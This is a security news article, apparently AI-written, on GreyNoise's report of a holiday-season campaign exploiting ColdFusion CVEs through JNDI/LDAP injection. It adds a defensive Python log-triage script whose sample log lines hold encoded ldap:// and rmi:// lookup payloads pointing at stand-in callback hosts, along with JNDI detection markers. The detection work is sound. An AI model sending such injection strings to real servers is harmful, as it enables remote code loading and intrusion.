

Ethical Hacking News

GreyNoise Uncovers a Large-Scale Exploitation Campaign Targeting ColdFusion Vulnerabilities



GreyNoise has identified a significant threat actor exploiting over a dozen Adobe ColdFusion vulnerabilities during the Christmas 2025 holiday period, highlighting the ongoing threat landscape in the cybersecurity world. Thousands of attack attempts were observed, with most coming from two IP addresses hosted by CTG Server Limited. The attackers' use of automated behavior and coordinated exploitation techniques suggests that this is a well-organized operation designed to maximize impact.

  • GreyNoise has identified a significant threat actor exploiting Adobe ColdFusion server vulnerabilities during the Christmas 2025 holiday period.
  • The attackers, operating from Japan-based infrastructure, have been systematically exploiting over a dozen ColdFusion CVEs from 2023-2024 using ProjectDiscovery Interactsh for out-of-band verification.
  • Two IP addresses (134.122.136[.]119 and 134.122.136[.]96) accounted for over 98% of observed ColdFusion exploitation traffic, suggesting they are the primary entry point and delivery vector for the malicious payload.
  • A handful of secondary IPs across Canada, India, and the US were used for reconnaissance and other support functions to avoid detection by traditional security controls.
  • The attackers' use of automated behavior cycling through multiple attack types suggests a well-organized operation designed to maximize impact.
  • Keeping ColdFusion servers up-to-date and patched is crucial to prevent exploitation, as these systems are still widely used by many organizations.



GreyNoise, a cybersecurity organization, has identified a significant threat actor that has been actively exploiting vulnerabilities in Adobe ColdFusion servers during the Christmas 2025 holiday period. The organization's researchers have observed thousands of attack attempts, with the vast majority coming from two IP addresses hosted by CTG Server Limited (AS152194), a Hong Kong-based provider with prior links to various malicious activities.

The coordinated campaign, which appears to be a single threat actor operating from Japan-based infrastructure, has been systematically exploiting over a dozen ColdFusion CVEs from 2023-2024. The attacks used ProjectDiscovery Interactsh for out-of-band verification, with JNDI/LDAP injection as the primary vector. Most of the activity occurred on Christmas Day, suggesting deliberate timing to exploit reduced security monitoring.

According to GreyNoise's analysis, the two IP addresses responsible for the majority of the traffic, 134.122.136[.]119 and 134.122.136[.]96, accounted for over 98% of all observed ColdFusion exploitation traffic. This suggests that these IP addresses are not only the primary entry point for the threat actor but also the main vector for delivering the malicious payload.

In addition to the two IP addresses, GreyNoise has also identified a handful of secondary IPs across Canada, India, and the US that made up minor activity in the campaign. These secondary IPs were used for reconnaissance and other support functions, likely to avoid detection by traditional security controls.

The attackers' use of automated, coordinated behavior cycling through multiple attack types suggests that this is a well-organized operation designed to maximize the impact of their efforts. The attackers have also shown an interest in deserialization RCE, a technique used to exploit certain vulnerabilities in Adobe ColdFusion.

GreyNoise's findings highlight the importance of keeping ColdFusion servers up-to-date and patched, as these systems are still widely used by many organizations. The organization's researchers believe that this campaign may be part of a larger vulnerability scanning effort, with the attackers targeting more than 767 CVEs across various technology stacks.

The scale and breadth of this campaign demonstrate the significant threat posed by organized cyber actors operating from the shadows. As long as organizations continue to run outdated systems on out-of-date patching schedules, they risk becoming victims of such large-scale exploitation campaigns.

In conclusion, GreyNoise's discovery of a coordinated exploitation campaign targeting ColdFusion vulnerabilities highlights the ongoing threat landscape in the cybersecurity world. The organization's findings underscore the importance of staying vigilant and taking proactive measures to protect against such threats.
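As an added, defender-side illustration (not code from GreyNoise or this article): a small Python triage script that scans web server access logs for the traffic features described above, namely JNDI/LDAP-style lookup URLs smuggled into requests and the per-source-IP share of traffic, and pulls out any out-of-band callback hosts so they can be hunted in DNS logs. The log lines, hostnames, paths and parameter names are constructed; only the two high-volume source addresses are the ones reported above.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). The two busy source
# addresses are the ones GreyNoise reported; paths, hosts and parameters are made up.
SAMPLE_LOG = """\
134.122.136.119 - - [25/Dec/2025:03:14:07 +0000] "POST /index.cfm HTTP/1.1" 200 512 "-" "Mozilla/5.0"
134.122.136.96 - - [25/Dec/2025:03:14:09 +0000] "GET /index.cfm?name=ldap%3A%2F%2Fcallback.example.test%2Fa HTTP/1.1" 500 0 "-" "curl/8.0"
134.122.136.119 - - [25/Dec/2025:03:14:11 +0000] "GET /cfusion/index.cfm?data=rmi%3A%2F%2Foob.example.test%2Fb HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.7 - - [25/Dec/2025:03:20:40 +0000] "GET /index.cfm HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Dec/2025:04:02:13 +0000] "GET /robots.txt HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Substrings that indicate a JNDI/LDAP-style lookup URL placed in a request.
JNDI_MARKERS = ("jndi:", "ldap://", "ldaps://", "rmi://")
CALLBACK_RE = re.compile(r'(?:ldaps?|rmi)://([^/:\s]+)')
# Source addresses the GreyNoise report attributes over 98% of the traffic to.
KNOWN_SOURCES = {"134.122.136.119", "134.122.136.96"}

def parse_line(line):
    """Parse one access-log line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode twice: payloads are sometimes double-encoded to slip past naive filters.
    rec["decoded"] = unquote(unquote(rec["path"])).lower()
    rec["jndi"] = any(mk in rec["decoded"] for mk in JNDI_MARKERS)
    rec["callback_host"] = next(iter(CALLBACK_RE.findall(rec["decoded"])), None)
    rec["known_source"] = rec["ip"] in KNOWN_SOURCES
    return rec

def triage(log_text):
    """Summarise a log: per-IP share, suspicious requests and OOB callback hosts."""
    recs = [r for r in map(parse_line, log_text.splitlines()) if r]
    per_ip = Counter(r["ip"] for r in recs)
    total = len(recs)
    return {
        "total": total,
        "per_ip": per_ip,
        "share": {ip: n / total for ip, n in per_ip.items()} if total else {},
        "suspicious": [r for r in recs if r["jndi"] or r["known_source"]],
        "callback_hosts": sorted({r["callback_host"] for r in recs if r["callback_host"]}),
    }

if __name__ == "__main__":
    summary = triage(SAMPLE_LOG)
    for r in summary["suspicious"]:
        print(f'{r["ip"]:16} jndi={r["jndi"]} known={r["known_source"]} {r["decoded"]}')
    print("callback hosts to hunt in DNS logs:", summary["callback_hosts"])
```

Run it against a real access log by passing the file contents to `triage`; a source with an outsized share plus lookup-URL markers is the pattern GreyNoise describes.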



    Related Information:
  • https://www.ethicalhackingnews.com/articles/GreyNoise-Uncovers-a-Large-Scale-Exploitation-Campaign-Targeting-ColdFusion-Vulnerabilities-ehn.shtml

  • https://securityaffairs.com/186450/uncategorized/thousands-of-coldfusion-exploit-attempts-spotted-during-christmas-holiday.html


  • Published: Sat Jan 3 06:02:16 2026 by llama3.2 3B Q4_K_M
